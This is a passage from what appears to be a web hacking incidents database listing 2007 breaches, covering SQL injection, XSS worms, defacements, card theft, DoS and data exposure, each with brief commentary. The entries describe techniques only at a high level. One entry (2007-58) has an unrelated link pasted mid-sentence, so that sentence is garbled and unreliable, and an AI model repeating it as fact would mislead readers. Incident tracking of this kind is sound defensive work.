Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field: Security & Law Enforcement
Attacked Entity Geography: USA
Incident Description:

Just like WHID 2007-60, this hack is probably a representative of many other incidents. The Indonesian hacker Hmei7 has left the message "Hmei7 has touched your soul" on the Web site of the police department in Tucson, Arizona. Only unlike regular defacement, this time it is not the front page but rather the news section that was modified.

As many you know, the news section is one of the few database driven parts in many mostly static sites, as it allows the site owner to add news without requiring a web designer. Therefore it came as no surprise that the attack was identified by a public source as an SQL injection attack.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: Indonesia
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-69: The Orkut XSS Worm
WHID ID: 2007-69
Date Occured: 12/19/2007
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Worm
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description:

A vulnerability in the social networking site Orkut that allowed users to inject HTML and JavaScript into their profiles set the stage for a persistent XSS worm that appears to have affected more than 650,000 Orkut users.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-67: The Day My Web Site Was Hacked
WHID ID: 2007-67
Date Occured: 12/19/2007
Attack Method: Known Vulnerability
Application Weakness: Application Misconfiguration
Outcome: Link Spam
Attacked Entity Field: Media
Attacked Entity Geography: UK
Incident Description:

In an incident very similar to the Al Gore Hack, the personal blog of IT journalist Tim Anderson was also hacked. Unlike Mr. Gore, Tim discusses the breach and its origins.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology: WordPress
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-66: Hacker Conquer French Embassy In Libya Web Site
WHID ID: 2007-66
Date Occured: 12/19/2007
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Government
Attacked Entity Geography:
Incident Description:

To iframe or not to iframe, this is the question. As malware becomes more popular, the number of incidents, mostly insignificant, in which malware was planted on a hacked site is rising and WHID is not the right place to list all of them. We currently report such incidents if the hacked site is of interest or if the Attack_Method is known.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-65: Facebook suing a porn site over automated access
WHID ID: 2007-65
Date Occured: 12/19/2007
Attack Method: Process Automation
Application Weakness: Insufficient Anti-automation
Outcome: Leakage of Information
Attacked Entity Field: Internet
Attacked Entity Geography:
Incident Description:

Use of robots and automated software against a web site, as long as it is not done in order to break into the site, falls into a grey area. While hard to classify as an unlawful act, it is usually harmful to the site owner and possibly to the site users. Apart from using valuable resources, such an automated access may breach the site's usage license of public information and might also indicate unlawful activity such as using a botnet. Many times it is hard to know if such a blast of requests is a denial of service attack, brute force password cracking or just a search engine crawler.

Going forward we are going to add such incidents to WHID if there is a reason to believe that they are not friendly, even if the actual goal of the attack cannot be easily classified. The Facebook case at hand is a perfect example: while the details are not clear, the fact that Facebook filed a law suit implies that there is fire behind the smoke.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-64: Information about Duke's Students and Applicants Stolen
WHID ID: 2007-64
Date Occured: 12/19/2007
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field: Education
Attacked Entity Geography: USA
Incident Description:

The personal data of nearly 1,400 prospective Duke Law School students may have been stolen by a hacker from two separate databases, one including the prospective students' data and another filled with requests for information about the school.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-63: Credit card data theft at Kartenhaus, a Ticketmaster German subsidiary
WHID ID: 2007-63
Date Occured: 12/19/2007
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Credit Card Leakage
Attacked Entity Field: Retail
Attacked Entity Geography: Germany
Incident Description:

An unidentified group had stolen credit card numbers and billing addresses of the Hamburg, Germany ticket sales office Kartenhaus, a subsidiary of Ticketmaster. Some 66,000 customers who purchased tickets with a credit card from the Kartenhaus.de web site between October 24, 2006 and September 30, 2007 were affected.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-62: A security flaw in Passport Canada's website
WHID ID: 2007-62
Date Occured: 12/19/2007
Attack Method: Forceful Browsing
Application Weakness: Insufficient Authorization
Outcome: Monetary Loss
Attacked Entity Field: Government
Attacked Entity Geography: Canada
Incident Description:

The Web site of the Canadian passports authority enables users to access others' record by modifying a value of a parameter in the URI.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-61: Another inconvenient truth: Al Gore's Web site hacked
WHID ID: 2007-61
Date Occured: 12/19/2007
Attack Method: Known Vulnerability
Application Weakness: Application Misconfiguration
Outcome: Link Spam
Attacked Entity Field: Politics
Attacked Entity Geography: USA
Incident Description:

Whether comment spam by itself is an application failure or a necessary evil for site allowing rich comments is an open question. However it is reported that in this case vulnerability in WordPress allowed the spammers to actually penetrate the site and modify pages and not just abuse comments.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology: WordPress
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-60: The blog of a Cambridge University security team hacked
WHID ID: 2007-60
Date Occured: 12/19/2007
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Downtime
Attacked Entity Field: Education
Attacked Entity Geography: UK
Incident Description:

This story probably represents hundreds of similar stories. Many of us have come to rely on open source software, which is useful, feature reach and free. It enables us access to tools available to a few only a couple of years ago. The downside is that this easy availability means that many use the tools without having the time, resources and expertise to protect them. Systems such as phpBB and WordPress are good
examples of very popular open source systems that require constant
attention in order to maintain secure.

I am sure that the guys at Light Blue Touchpaper have the expertise to protect their WordPress installation, but they don’t have the time. They made the compromise between ease of management of their web site and its security. Actually my personal blog might be just as vulnerable, since as I write this I am very much not paying attention to its security.

Apart from, or actually because of the fact that the victims are security experts, this story is noteworthy due to two additional twists in the plot:

  • Zero day exploit in the wild - the attacker penetrated twice, once using a known SQL injection vulnerability, but the second time using a yet unknown vulnerability in WordPress, which was reverse engineered and published for the first time by the people at Light Blue Touchpaper.
  • The researchers found that they can use Google to retrieve the hashed password of the hacker. Google has become so big that it actually allows efficient encrypted passwords lookup.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology: WordPress
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-59: Hackers jack Monster.com, infect job hunters
WHID ID: 2007-59
Date Occured: 11/21/2007
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Internet
Attacked Entity Geography: USA
Incident Description:

A Crimeware iframe tag on a site is not news anymore. On Monster.com it is.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-58: Internet Retailer Publisher Victim of Customer File Hack
WHID ID: 2007-58
Date Occured: 11/7/2007
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field: Media
Attacked Entity Geography: USA
Incident Description:

Vertical Web Media, publisher of Internet Retailer magazine, suffered a security http://www.theregister.co.uk/2007/08/17/gentoo_disconnects_vulnerable_se... and credit card information of readers had been stolen. The Irony is that Internet Retailed magazine is covering the risks of e-commerce.

While the actual technique used is not known, signs are that it was a web hack as it was done by a distributed network of bots all over the world and since the information stolen belonged to customers who paid online.

The information stolen includes names, addresses, e-mail addresses, phone numbers, credit card account numbers and card expiration dates. The Number_of_Records stolen is unknown.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-57: New Zealand's Government Web Sites Attacked And Information Stolen
WHID ID: 2007-57
Date Occured: 11/7/2007
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field: Government
Attacked Entity Geography: New Zealand
Incident Description:

An attack on New Zealand government web sites required New Zealand Prime Minister, Helen Clark to comment and ensure the public that no confidential information was stolen. However official sources in New Zealand confirm attacks were carried out by unnamed, but known, foreign governments on New Zealand government web site that resulted in stealing of information.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-56: TJMaxx XSS Vulnerability
WHID ID: 2007-56
Date Occured: 11/7/2007
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Leakage of Information
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description:

A small XSS vulnerably caught RSnake eyes. What makes it different, after all xssed.com lists thousands and thousands of those? What caught RSnames eyes was the vulnerable site. TJMaxx earned the reputation as the company that suffered the biggest security breach ever. You would expect them to be more careful.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-55: Malicious Code Infects Chinese Security Site
WHID ID: 2007-55
Date Occured: 11/7/2007
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Planting of Malware
Attacked Entity Field: Media
Attacked Entity Geography: China
Incident Description:

Defacement are a dime a dozen this days, and are not normally reported by WHID. Even invisible defacements in which sites are changed in order to infect their clients with malicious code are becoming too common. But this time it is the site of a security organization, and not just any one, but China's internet security organization. So in the light of the hot debate about china as the source of all hacking, we think that this story has a value.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-54: Mistake Left Constables Open To ID theft
WHID ID: 2007-54
Date Occured: 11/7/2007
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field: Security & Law Enforcement
Attacked Entity Geography: UK
Incident Description:

An Excel spreadsheet was published on containing sensitive information regarding police officers in York, England. The information included Social Security numbers of 46 offices and the home addresses of 74 offices. As a result identities of 3 offices where stolen.

While the information was pulled of line after a short period of time, it remained in the cache of several major search engines.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-53: Google's Advanced Search Operators Abused by Spammers
WHID ID: 2007-53
Date Occured: 11/7/2007
Attack Method: Redirection
Application Weakness: Insufficient Authorization
Outcome: Link Spam
Attacked Entity Field: Internet
Attacked Entity Geography: Global
Incident Description:

While most WHID entries are about web site breaches, sometimes vulnerability in a web application is used indirectly. Redirection functions in web applications are commonly used by spammers and phishers. It allows them to include a honest looking URL in their e-mail, this way bypassing spam filters and observant users.

Symantec response team found actively used alternative in the best known page on the internet: Google primary search page. By using the Google famous "I feel lucky" feature, the spammer can automatically lead the victim to the first result of a search. All the spammer is left with is finding a query for which his site would pop up first on Google.

This method has another advantage over a redirection page, as the final target is specified by a search string and not by a URL, bypassing smarter filters that know, or learn, that a URL as a parameter of a URL is most probably redirection.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-52: Hacker halts Rivkin auction of 37 watches
WHID ID: 2007-52
Date Occured: 11/5/2007
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Retail
Attacked Entity Geography: Australia
Incident Description:

Seems that the there is a new trend to disrupt on line bidding using denial of service attacks. In this case, an auction for 37 very expensive watches was halted 20 minutes before the end as the site crashed, in what official sources describe as a hacker attack that did not result in a site compromise.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-51: 570 Scarborough & Tweed customers' personal information accessed by SQL injection
WHID ID: 2007-51
Date Occured: 11/4/2007
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description:

The web servers of Scarborough & Tweed, a company that does business online selling corporate gifts online, were compromised and information about 570 customers may have been accessed using an SQL injection attack. The information includes customers' names, addresses, telephone numbers, account numbers, and credit card numbers.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-50: Art.com says hacker accessed names, credit cards
WHID ID: 2007-50
Date Occured: 10/29/2007
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Credit Card Leakage
Attacked Entity Field: Retail
Attacked Entity Geography: Global
Incident Description:

A hacker gained access to names and encrypted credit card numbers of Arts.com. While the reason is not known, since the information is known to belong to online shoppers who made transactions from July to September we assume it was a web site breach.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-49: Hackers Block Sale of Colorado Rockies World Series Tickets
WHID ID: 2007-49
Date Occured: 10/25/2007
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Loss of Sales
Attacked Entity Field: Sports
Attacked Entity Geography: USA
Incident Description:

The site of the Rockies was taken down by a denial of service preventing fans from buying tickets for the World Series games.


Like any DDoS attack, it is very hard to know if it was an application layer or network layer attack, but since this attack had a very significant financial impact by crippling a web site, we think it deserve a place in WHID.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-48: MSU investigating hacking incident
WHID ID: 2007-48
Date Occured: 10/17/2007
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field: Education
Attacked Entity Geography: USA
Incident Description:

Information including birth date and social security number of 1400 students who enrolled online to the Montana State University has been stolen by hackers. While no technical explanation is provided, the fact that only students who enrolled online where affected points to a web site breach.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-47: Commerce Bank, a US regional bank, hacked
WHID ID: 2007-47
Date Occured: 10/12/2007
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Finance
Attacked Entity Geography: USA
Incident Description:

3,000 records were exposed and 20 actually stolen at Commerce Bank, a small bank in Central USA. While the vulnerability exploited is not clear, SQL injection was mentioned. Therefore the record is uncertain and based on further information, it might be withdrawn.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-46: School Web site breached? Personal info of Pembroke workers, volunteers accessible for months
WHID ID: 2007-46
Date Occured: 10/11/2007
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field: Education
Attacked Entity Geography: USA
Incident Description:

Personal information on anyone who worked or volunteered for the Pembroke schools in the last four years was accessible via the Internet because of a weakness in the district's computer system. The information, including names, birth dates and Social Security numbers, was available from May until Oct. 2, when school officials learned of the problem.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-45: XSS flaw makes PM say: "I want to suck your blood"
WHID ID: 2007-45
Date Occured: 10/10/2007
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Politics
Attacked Entity Geography: Australia
Incident Description:

Using XSS on the sites of both Australian major political parties a security researcher nicknamed Bsoric caused the Liberal Party's Web site to read: "John Howard says: I want to suck your blood", while another script caused a window to pop up on the Labor Party's Web site, urging viewers to "Vote Liberal!"

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-44: Hacker Breaks Into eBay Server, Locks Users Out
WHID ID: 2007-44
Date Occured: 10/10/2007
Attack Method: Misconfiguration
Application Weakness: Insufficient Authentication
Outcome: Downtime
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description:

A hacker exploited a leftover admin function on eBay to block users and close sales.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-43: Hacker attacks the Ministry for Housing website as Spanish mortgages come under the international spotlight
WHID ID: 2007-43
Date Occured: 9/3/2007
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: Spain
Incident Description:

Yet another defacement, and as usual in the political arena.
However, this one is worth a note as the attack is very targeted, while
usually such political defacements are carried quote randomly against
sites loosely related to the opponent and usually has little to do with
the actual message the attackers want to convey. In this case the
defacement seems to be a direct response to the hot debate about
housing prices in Spain.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-42: Bank of India seriously compromised
WHID ID: 2007-42
Date Occured: 9/3/2007
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Finance
Attacked Entity Geography: India
Incident Description:

This very serious hacking incident provides insight into a lot
of the failures information security in general and web application
security particularly beyond the simple fact that the web site of the
largest state owned bank in India was invisibly defaced with Trojan
inflicting code.

Firstly, the entire discussion in the references is about the
Trojan payload, with no word about the vulnerability that led to the
defacement. Actually a reviewer on the SiteAdvisor report gives the
green mark to the web site after the Trojan is removed, without
requiring any information about the actual problem.

Secondly, most trust systems, including SiteAdvisor,
completely fail to detect the breach. Which makes me think about those
trust models: they check that the site was not breached, while they
should check that the site is not vulnerable. I guess the reason is
that their primary goal is to detect intentionally malicious sites and
not breaches is normative sites, but others use them to assess the
level of security of the later.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-41: Hackers hit New Zealand Herald website
WHID ID: 2007-41
Date Occured: 9/2/2007
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Media
Attacked Entity Geography:
Incident Description:

Still defacement but this time with a twist. This was a genuine XSS rewriting attack, and was carried out by well known people as a stunt. No information is provided on how the XSS vector found its way to the victim computers.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-40: County's Web site hacked; no data lost
WHID ID: 2007-40
Date Occured: 9/2/2007
Attack Method: Known Vulnerability
Application Weakness: Application Misconfiguration
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description:

Defacements seem to dominate the list recently, probably because they reach everywhere. Two important conclusions from this particular one are that patch management is a key problem and that it is a problem mainly at government sites across the world.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-39: Hacker sabotages Peru president's Web site
WHID ID: 2007-39
Date Occured: 8/30/2007
Attack Method: Unknown
Application Weakness: Application Misconfiguration
Outcome: Defacement
Attacked Entity Field: Politics
Attacked Entity Geography: Peru
Incident Description:

Defacements seem to start dominating this list. Alas, they are the most obvious web site hacks out there. While not every defacement is reported in the Web Hacking Incidents Database, key ones are. I included this one since the attacked web site is significant, and since it emphasizes what is becoming a major goal of attacking: politics and international affairs.
As a side note, this incident is also interesting because it was repeated after discovered and presumably fixed, which goes a long way to show how much effort there is in protecting web sites and how difficult it cab be.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-38: Gentoo takes server offline due to security vulnerabilities
WHID ID: 2007-38
Date Occured: 8/30/2007
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Downtime
Attacked Entity Field: Technology
Attacked Entity Geography:
Incident Description:

This gem is very interesting since it happened on Gentoo servers. It therefore combines transparency into the incident that only an open source project can offer with the importance and resource of a large one. As a result we have a detailed report about the vulnerability, exploit attempts and event people shouting at each other during the patching process.
What can we learn from this? That no server is secure, and that patching is hard.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-37: United Nations VS SQL Injections
WHID ID: 2007-37
Date Occured: 8/13/2007
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: United Nations
Incident Description:

Defacements are usually beyond the scope of the Web Hacking Incidents Database. We only publish those that stand out, and this one certainly stands out.

The site of the United Nations was broken into and defaced using a pretty basic SQL injection technique, and the referenced article has all the details

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-36: Server hacked through holes in Confixx management software
WHID ID: 2007-36
Date Occured: 8/12/2007
Attack Method: OS Commanding
Application Weakness: Application Misconfiguration
Outcome: Downtime
Attacked Entity Field: Service Providers
Attacked Entity Geography: Germany
Incident Description:

A command injection vulnerability at 1&1, a large German hosting provider, lead to denial of service and possible home page modification at 30 servers and up to 1700 web sites.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology: Confixx
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-35: Data lapse involved 51,000 at a hospital
WHID ID: 2007-35
Date Occured: 7/30/2007
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Health
Attacked Entity Geography: USA
Incident Description:

In a classic case of lack of proper separation between the production and development sites, an application under production with lack of proper authentication and authorization was installed on a hospital's public web site, enabling anyone to query a database of 51,000 names, addresses and social security numbers.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-34: Fox News leaks secret files
WHID ID: 2007-34
Date Occured: 7/25/2007
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Media
Attacked Entity Geography: USA
Incident Description:

Fox News left non public files on a directory accessible to everyone on their web server.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-33: THAILAND: ICT Ministry website sabotaged by hacker
WHID ID: 2007-33
Date Occured: 7/22/2007
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: Thailand
Incident Description:

While defacements are usually not the bread and butter of this database, when it hits an important government site, especially of a ministry in charge of information technology, it is worth mentioning it.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-32: XSS vulnerability on various German online banking sites
WHID ID: 2007-32
Date Occured: 7/1/2007
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Leakage of Information
Attacked Entity Field: Finance
Attacked Entity Geography: Germany
Incident Description:

I seldom add disclosures anymore to WHID, even less XSS disclosures, but since this time they were discovered in banking sites, I thought it was worth it. After all, too many times people think that application vulnerabilities are found only at less "serious" or less "important" web sites where no real damage can occur.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-31: Hackers Make Off With Personal Info On Applicants At UC Davis
WHID ID: 2007-31
Date Occured: 7/1/2007
Attack Method: Unknown
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Somebody snitched names, social security number and birth dates of approximately 1500 students at the vet school of UC Davis. Indication is that the web application used by the students was as fault. The school's web site described the incident as a result of "the computer attacker being able to manipulate a university computing application to accept unauthorized commands". A disgruntled cow?

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-30: Microsoft UK site defaced
WHID ID: 2007-30
Date Occured: 7/1/2007
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field: Technology
Attacked Entity Geography: UK
Incident Description:

Yet another defacement, but with a very high profile target, and a detailed description of the attack which took advantage of an SQL injection vulnerability. The report even includes a video recording of the attack.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-29: Teen arrested for hacking Belgian police website
WHID ID: 2007-29
Date Occured: 6/26/2007
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Security & Law Enforcement
Attacked Entity Geography: Belgium
Incident Description:

As you may know, defacement usually do not find their way to WHID, especially if the method used is not known. However, since in this case the victim was the Belgian police, I though it is worth including.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-28: US Embassy probes hacking of online visa appointment system
WHID ID: 2007-28
Date Occured: 6/17/2007
Attack Method: Process Automation
Application Weakness: Insufficient Process Validation
Outcome: Disinformation
Attacked Entity Field: Government
Attacked Entity Geography:
Incident Description:

If you live in a country from which you need a Visa to get to the states, you knew this would happen. The US online Visa appointment system is very open. Indeed too open. Someone in Jamaica took advantage of this to pre-allocate appointments.


While this might be classified as a business process design flaw, isn't security also about this?

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-27: Files From Google On the Streets
WHID ID: 2007-27
Date Occured: 6/12/2007
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Internet
Attacked Entity Geography: USA
Incident Description:

Google left some files at the wrong place at the wrong time. These files includes, surprisingly, database connection strings, including a user name and a password. Hardly news, but this time it is Google.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-26: $1,000,000 CNBC stock trading contest hacked
WHID ID: 2007-26
Date Occured: 6/12/2007
Attack Method: Process Automation
Application Weakness: Insufficient Session Expiration
Outcome: Disinformation
Attacked Entity Field: Media
Attacked Entity Geography: USA
Incident Description:

The CNBC stock trading reality TV show was even more real than contenders thought it would be. It seems that players learned to cheat the game by opening a browser form to by a stock before closing and issuing the transaction, at the set price, only after closing, when more information is already available.


The interesting anecdote is that the person who discovered the issue has used a different, but also questionable technique of maintaining a very large number of portfolios automatically managed by automated programs using the fact that the game allowed a user to have any number of portfolios but only the best one is counted. Kosher, but stinks.


This story remind an older story about a predictable delay in a poker game that enabled gamblers to beat the house.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-25: University of Iowa Molecular and Cellular Biology Program Security Incident
WHID ID: 2007-25
Date Occured: 6/12/2007
Attack Method: Unknown
Application Weakness: Application Misconfiguration
Outcome: Leakage of Information
Attacked Entity Field: Education
Attacked Entity Geography: USA
